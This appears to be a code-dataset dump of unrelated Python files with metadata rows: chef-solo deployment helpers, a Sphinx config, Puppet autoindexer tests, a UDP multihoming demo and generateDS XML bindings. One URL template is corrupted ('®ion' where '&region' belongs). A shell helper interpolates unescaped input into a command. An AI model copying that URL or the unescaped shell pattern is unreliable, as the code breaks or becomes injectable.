def _get_api_response(args, region=None, logger=None):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
if not args['api_url']:
return None
request_url = '{0}/nodes/group?status={1}'.format(
args['api_url'],
'running'
)
if region is not None:
request_url = '{0}®ion={1}'.format(request_url, region)
request = urllib2.Request(request_url)
has_username = 'api_username' in args
has_password = 'api_password' in args
if has_username and has_password:
base64string = base64.encodestring('{0}:{1}'.format(
args['api_username'], args['api_password']
)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
result = urllib2.urlopen(request)
if int(result.getcode()) not in [200, 201, 204]:
error = 'Bad response from api'
try:
data = json.loads(result.read())
error = data.get('message', 'Bad response from api')
except:
pass
logger.error(error)
sys.exit(1)
response = None
try:
response = json.loads(result.read())
except ValueError:
logger.error('Invalid json response from api')
sys.exit(1)
groups = response['groups']
if 'None' in groups:
del groups['None']
return groups
def _get_group_dna_file(group_name, asg_dna_files):
group_name = slugify(rchop(group_name, '.json'))
group_dna_file = None
for asg_dna_file in asg_dna_files:
if asg_dna_file == group_name:
group_dna_file = asg_dna_file
break
group_name_json = group_name + '.json'
if asg_dna_file == group_name_json:
group_dna_file = asg_dna_file
break
if not group_dna_file:
for asg_dna_file in asg_dna_files:
if group_name.startswith(asg_dna_file):
group_dna_file = asg_dna_file
break
stripped_asg_dna_file = asg_dna_file.replace('.json', '')
if group_name.startswith(stripped_asg_dna_file):
group_dna_file = asg_dna_file
break
if not group_dna_file:
group_dna_file = group_name
return group_dna_file
def dna_file_name_from_tags(args, dna_file_name, tags):
env_tag = args['environment_tag']
strip_env = args['strip_environment_from_dna_file_run_tag']
tag = args['dna_file_tag']
if not args['use_alternate_databag'] and args['dna_file_tag'] and tags.get(args['dna_file_tag'], None):
dna_file_name = tags.get(tag, None)
if strip_env and env_tag and tags.get(env_tag, None):
environment = tags.get(env_tag, None)
dna_file_name = strip_left(dna_file_name, environment)
dna_file_name = strip_right(dna_file_name, environment)
dna_file_name = dna_file_name.strip('_-')
dna_file_name = rchop(dna_file_name, '.json') + '.json'
return dna_file_name
def strip_right(text, suffix):
if not text.endswith(suffix):
return text
return text[:len(text)-len(suffix)]
def strip_left(text, prefix):
if not text.startswith(prefix):
return text
return text[len(prefix):]
def rsync_project_dry(args, logger=None, **kwargs):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
if args['dry_run']:
logger.info("[RSYNC_PROJECT] From {0} to {1} with opts='{2}' excluding='{3}'".format(kwargs.get('local_dir'), kwargs.get('remote_dir'), kwargs.get('extra_opts'), kwargs.get('exclude'))) # noqa
else:
out = rsync_project(**kwargs)
if out.return_code != 0:
logger.info("[RSYNC_PROJECT] Failed command with status code {0}, please run `chef-solo-cup clean` against this node".format(out.return_code)) # noqa
sys.exit(0)
def run_dry(cmd, args, logger=None):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
if args['dry_run']:
logger.info("[RUN] {0}".format(cmd))
else:
return run(cmd)
def sudo_dry(cmd, args, logger=None):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
if args['dry_run']:
logger.info("[SUDO] {0}".format(cmd))
else:
return sudo(cmd)
def add_line_if_not_present_dry(args, filename, line, run_f=run, logger=None):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
cmd = "grep -q -e '{0}' {1} || echo '{0}' >> {1}".format(line, filename)
if args['dry_run']:
logger.info("[SUDO] {0}".format(cmd))
else:
run_f(cmd)
def filter_hosts(args, hosts, logger=None):
rules = args['blacklist_rules'].get(args['command'])
if not rules:
return hosts
excludes = []
for rule in rules:
if rule.startswith('/') and rule.endswith('/'):
pattern = rule[1:-1]
if not pattern:
continue
excludes.append(pattern)
else:
excludes.append(rule)
excludes = map(lambda x: re.compile(x), excludes)
new_hosts = {}
for host, config in hosts.items():
skip = map(lambda regex: regex.search(host), excludes)
skip = reduce(lambda x, y: x or y, skip)
if skip:
continue
new_hosts[host] = config
return new_hosts
def slugify(text):
if type(text) == unicode:
text = unidecode.unidecode(text)
text = text.strip()
text = text.lower()
text = re.sub(r'[^a-z0-9_-]+', '-', text)
text = re.sub(r'-{2,}', '-', text)
return text
def rchop(s, ending):
if s.endswith(ending):
return s[:-len(ending)]
return s
| mit | -8,145,522,986,752,087,000 | 30.273101 | 201 | 0.535259 | false |
scikit-learn-contrib/project-template | doc/conf.py | 1 | 10143 | # -*- coding: utf-8 -*-
#
# project-template documentation build configuration file, created by
# sphinx-quickstart on Mon Jan 18 14:44:12 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_gallery
import sphinx_rtd_theme
# Add to sys.path the top-level directory where the package is located.
sys.path.insert(0, os.path.abspath('..'))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'numpydoc',
'sphinx_gallery.gen_gallery',
]
# this is needed for some reason...
# see https://github.com/numpy/numpydoc/issues/69
numpydoc_show_class_members = False
# pngmath / imgmath compatibility layer for different sphinx versions
import sphinx
from distutils.version import LooseVersion
if LooseVersion(sphinx.__version__) < LooseVersion('1.4'):
extensions.append('sphinx.ext.pngmath')
else:
extensions.append('sphinx.ext.imgmath')
autodoc_default_flags = ['members', 'inherited-members']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# generate autosummary even if no references
autosummary_generate = True
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# Generate the plots for the gallery
plot_gallery = True
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sklearn-template'
copyright = u'2016, Vighnesh Birodkar'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from skltemplate import __version__
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', '_templates']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Custom style
html_style = 'css/project-template.css'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'project-templatedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'project-template.tex', u'project-template Documentation',
u'Vighnesh Birodkar', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'project-template', u'project-template Documentation',
[u'Vighnesh Birodkar'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'project-template', u'project-template Documentation',
u'Vighnesh Birodkar', 'project-template', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
# intersphinx configuration
intersphinx_mapping = {
'python': ('https://docs.python.org/{.major}'.format(
sys.version_info), None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('https://matplotlib.org/', None),
'sklearn': ('http://scikit-learn.org/stable', None)
}
# sphinx-gallery configuration
sphinx_gallery_conf = {
'doc_module': 'skltemplate',
'backreferences_dir': os.path.join('generated'),
'reference_url': {
'skltemplate': None}
}
def setup(app):
# a copy button to copy snippet of code from the documentation
app.add_javascript('js/copybutton.js')
| bsd-3-clause | -1,843,109,958,325,797,000 | 30.696875 | 80 | 0.709751 | false |
jaredjennings/shaney | shaney/generators/test/test_autoindex.py | 1 | 6482 | # shaney - prepare Puppet code with LaTeX comments for multiple audiences.
# Based on <https://github.com/afseo/cmits>.
# Copyright (C) 2015 Jared Jennings, [email protected].
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from shaney.generators.test import CoroutineTest
from shaney.generators.autoindex import autoindex
import new
class TestUnrecognizedPassesThrough(CoroutineTest):
"""Whatever the autoindexer does not care about, it sends through:"""
coroutine_under_test = autoindex
send = [
('comment', 'bla'),
('verbatim', ''),
('fnord', 'bletch'),
]
expect = [
('comment', 'bla'),
('verbatim', ''),
('fnord', 'bletch'),
]
class AutoIndexTest(CoroutineTest):
# You can't say """ inside of a triple-quoted string, you have to
# say ""\". So when you see ""\" in the example it means you should
# write """. Also you have to escape backslashes in a non-raw
# string, so \\ below means \.
"""Test most properties of autoindex.
The autoindexer expects to be sent tuples denoting what's going on
in an input file, like this set::
('comment', 'some documentation about this Puppet class')
('verbatim', 'class puppetclass {')
('verbatim', ' mumble')
('verbatim', '}')
It won't act on anything that isn't toplevel, so for most of our
tests, we'll want to send in a bunch of ('verbatim', 'foo'). This
class factors that out, so you can make the send value less verbose.
Also, unless you write the docstring strangely, there will always be
a blank line at the end of send; this class will automatically add
('verbatim', '') to the expect so you don't have to write it.
Example::
class TestThingAutoindexDoes(AutoindexTest):
""\"When it sees an include, it emits ('include', 'thing'):""\"
send = ""\"\\
include two
""\"
expect = [
('include', 'two'),
('verbatim', 'line two'),
]
"""
send = ''
expect = []
coroutine_under_test = autoindex
def preprocess_send(self):
for x in self.send.split("\n"):
yield ('verbatim', x)
def preprocess_expect(self):
for x in self.expect:
yield x
yield ('verbatim', '')
class TestClassDefinition(AutoIndexTest):
"""Classes defined are indexed:"""
send = """\
class foo::bar {
some stuff
}
"""
expect = [
('index_entry', 'class', 'foo::bar', 'defined'),
('label', 'class_foo::bar'),
('verbatim', 'class foo::bar {'),
('verbatim', ' some stuff'),
('verbatim', '}'),
]
class TestParameterizedClassDefinition(AutoIndexTest):
"""When classes are defined with parameters, only the name is indexed:"""
send = """\
class foo::bar($param1, $param2) {
some stuff
}
"""
expect = [
('index_entry', 'class', 'foo::bar', 'defined'),
('label', 'class_foo::bar'),
('verbatim', 'class foo::bar($param1, $param2) {'),
('verbatim', ' some stuff'),
('verbatim', '}'),
]
class TestClassUseByInclude(AutoIndexTest):
"""Classes used by means of `include` are indexed:"""
send = """\
include foo_bar::baz
"""
expect = [
('index_entry', 'class', 'foo_bar::baz'),
('verbatim', ' include foo_bar::baz'),
('margin_ref', 'class_foo_bar::baz'),
]
class TestClassUseByClassBracket(AutoIndexTest):
"""Classes used by means of ``class {...}``` are not yet supported:"""
send = """\
class { 'foo::bar':
bla
}
"""
expect = [
('index_entry', 'class', 'foo::bar'),
('verbatim', "class { 'foo::bar':"),
('margin_ref', 'class_foo::bar'),
('verbatim', ' bla'),
('verbatim', '}'),
]
class TestDefinedResourceTypeDefinition(AutoIndexTest):
"""Defined resource types are indexed:"""
send = """\
define foo_bar::baz($paramOne,
$paramTwo) {
}
"""
expect = [
('index_entry', 'define', 'foo_bar::baz', 'defined'),
('label', 'define_foo_bar::baz'),
('verbatim', 'define foo_bar::baz($paramOne,'),
('verbatim', ' $paramTwo) {'),
('verbatim', '}'),
]
class TestDefinedResourceTypeUse(AutoIndexTest):
"""Uses of defined resource types are indexed and noted:"""
send = """\
class foo {
bar_baz::bletch { "gack": }
}
"""
expect = [
('index_entry', 'class', 'foo', 'defined'),
('label', 'class_foo'),
('verbatim', 'class foo {'),
('index_entry', 'define', 'bar_baz::bletch'),
('verbatim', ' bar_baz::bletch { "gack": }'),
('margin_ref', 'define_bar_baz::bletch'),
('verbatim', '}'),
]
class TestFileUseSameLine(AutoIndexTest):
"""Mentions of files are indexed:"""
send = """\
file { "/foo/bar/baz":
...
}
"""
expect = [
('index_entry', 'file', '/foo/bar/baz'),
('verbatim', 'file { "/foo/bar/baz":'),
('verbatim', ' ...'),
('verbatim', '}'),
]
class TestFileUseDifferentLine(AutoIndexTest):
"""Some file syntaxes are not yet supported:"""
send = """\
file {
"/foo/bar/baz":
...;
"/bletch/quux/gark":
...;
}
"""
expect = [
('verbatim', 'file {'),
('verbatim', ' "/foo/bar/baz":'),
('verbatim', ' ...;'),
('verbatim', ' "/bletch/quux/gark":'),
('verbatim', ' ...;'),
('verbatim', '}'),
]
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 7,108,182,453,560,785,000 | 29.28972 | 77 | 0.543042 | false |
fishilico/shared | python/network/udp_multihome.py | 1 | 7006 | #!/usr/bin/env python3
# -*- coding:UTF-8 -*-
# Copyright (c) 2014 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""This program show how it is possible to run an UDP server with multihoming.
The main issue is to reply to incoming requests with the right source address,
when several ones are available. This is done by using recvmsg/sendmsg
functions instead of recvfrom/sendto which only control the remote address.
This use-case is called "multihoming".
This program has been insipred by OpenVPN source code (src/openvpn/socket.c)
@author: Nicolas Iooss
@license: MIT
"""
import argparse
import logging
import os
import socket
import struct
import sys
logger = logging.getLogger(__name__)
# Check feature availability (need python>=3.3)
if not hasattr(socket.socket, 'recvmsg'):
raise NotImplementedError("socket.recvmsg() not found (need Python >= 3.3)")
# Define some system-specific constants
if sys.platform.startswith('linux'):
if not hasattr(socket, 'IP_PKTINFO'):
socket.IP_PKTINFO = 8
if not hasattr(socket, 'IPV6_RECVPKTINFO'):
socket.IPV6_RECVPKTINFO = 49
if not hasattr(socket, 'IPV6_PKTINFO'):
socket.IPV6_PKTINFO = 50
if not hasattr(socket, 'SO_BINDTODEVICE'):
socket.SO_BINDTODEVICE = 25
elif os.name == 'nt':
if not hasattr(socket, 'IP_RECVDSTADDR'):
socket.IP_RECVDSTADDR = 25
if not hasattr(socket, 'IPV6_RECVDSTADDR'):
socket.IPV6_RECVDSTADDR = 25
else:
raise Exception("Unsupported system")
def main(argv=None):
parser = argparse.ArgumentParser(description="Simple multihomed UDP server")
parser.add_argument('-p', '--port', type=int, default=4242,
help="UDP port to be used (default: 4242)")
parser.add_argument('-w', '--wait', action='store_true',
help="wait for connections instead of creating one")
group = parser.add_mutually_exclusive_group()
group.add_argument('-4', '--ipv4', action='store_true',
help="create an IPv4-only socket")
group.add_argument('-6', '--ipv6', action='store_true',
help="create an IPv6-only socket")
args = parser.parse_args(argv)
# Compute local variables
af = socket.AF_INET if args.ipv4 else socket.AF_INET6
localaddr = '127.0.0.1' if args.ipv4 else '::1'
anyaddr = '0.0.0.0' if args.ipv4 else '::'
port = args.port if args.port > 0 else 4242
# Create and configure socket for multihoming
skserver = socket.socket(af, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
if not args.ipv6:
if hasattr(socket, 'IP_PKTINFO'):
skserver.setsockopt(socket.SOL_IP, socket.IP_PKTINFO, 1)
elif hasattr(socket, 'IP_RECVDSTADDR'):
skserver.setsockopt(socket.IPPROTO_IP, socket.IP_RECVDSTADDR, 1)
if not args.ipv4:
if hasattr(socket, 'IPV6_RECVPKTINFO'):
skserver.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVPKTINFO, 1)
elif hasattr(socket, 'IPV6_RECVDSTADDR'):
skserver.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVDSTADDR, 1)
if not args.ipv4:
skserver.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, args.ipv6)
# Listen
if args.wait:
listenaddr = anyaddr
elif args.ipv6 or args.ipv4:
listenaddr = localaddr
else:
# To protect dual-stack listen, bind the socket to the loopback interface
listenaddr = anyaddr
try:
skserver.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, b'lo\0')
except PermissionError as exc:
logger.warning("Unable to bind to loopback interface: %s", exc)
ainfos = socket.getaddrinfo(listenaddr, port, af, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
skserver.bind(ainfos[0][4])
if args.wait:
logger.info("Waiting for a connection on UDP port %d.", port)
else:
# Create a client socket, which uses IPv4-in-IPv6 if enabled
clientaf = socket.AF_INET if not args.ipv6 else socket.AF_INET6
clientdstaddr = '127.0.0.1' if not args.ipv6 else '::1'
skclient = socket.socket(clientaf, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
skclient.sendto(b'Hello, world!', (clientdstaddr, port))
# Receive an incoming packet
(msg, ancdata, _, clientaddrport) = skserver.recvmsg(1024, socket.CMSG_SPACE(100))
assert args.wait or msg == b'Hello, world!' # Check the socket channel
dst_addr = None
ifindex = None
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level == socket.SOL_IP and hasattr(socket, 'IP_PKTINFO') and cmsg_type == socket.IP_PKTINFO:
# struct in_pktinfo { int ipi_ifindex; struct in_addr ipi_spec_dst, ipi_addr; };
assert len(cmsg_data) == 12
dst_addr = socket.inet_ntop(socket.AF_INET, cmsg_data[4:8])
ifindex = struct.unpack('I', cmsg_data[:4])[0]
elif cmsg_level == socket.IPPROTO_IPV6 and hasattr(socket, 'IPV6_PKTINFO') and cmsg_type == socket.IPV6_PKTINFO:
# struct in6_pktinfo { struct in6_addr ipi6_addr; int ipi_ifindex; };
assert len(cmsg_data) == 20
dst_addr = socket.inet_ntop(socket.AF_INET6, cmsg_data[:16])
ifindex = struct.unpack('I', cmsg_data[16:20])[0]
else:
logger.warning("Unknown anciliary data: %s, %s, %r", cmsg_level, cmsg_type, cmsg_data)
# TODO: decode IP_RECVDSTADDR/IPV6_RECVDSTADDR
text = "Received UDP packet from {0[0]} port {0[1]}".format(clientaddrport)
if dst_addr is not None:
text += " to {} port {} interface {}".format(dst_addr, port, ifindex)
logger.info(text)
# Send back a reply with the same ancillary data
skserver.sendmsg([b'Bye!\n'], ancdata, 0, clientaddrport)
skserver.close()
if not args.wait:
skclient.close()
return 0
if __name__ == '__main__':
logging.basicConfig(format='[%(levelname)s] %(message)s', level=logging.DEBUG)
sys.exit(main())
| mit | -7,359,975,875,040,569,000 | 42.246914 | 120 | 0.672566 | false |
ColinIanKing/autotest | client/tools/JUnit_api.py | 1 | 63896 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Thu Dec 1 09:58:36 2011 by generateDS.py version 2.7a.
#
import sys
import getopt
import re as re_
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError("Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node, 'Requires sequence of booleans ("true", "1", "false", "0")')
return input_data
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level):
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
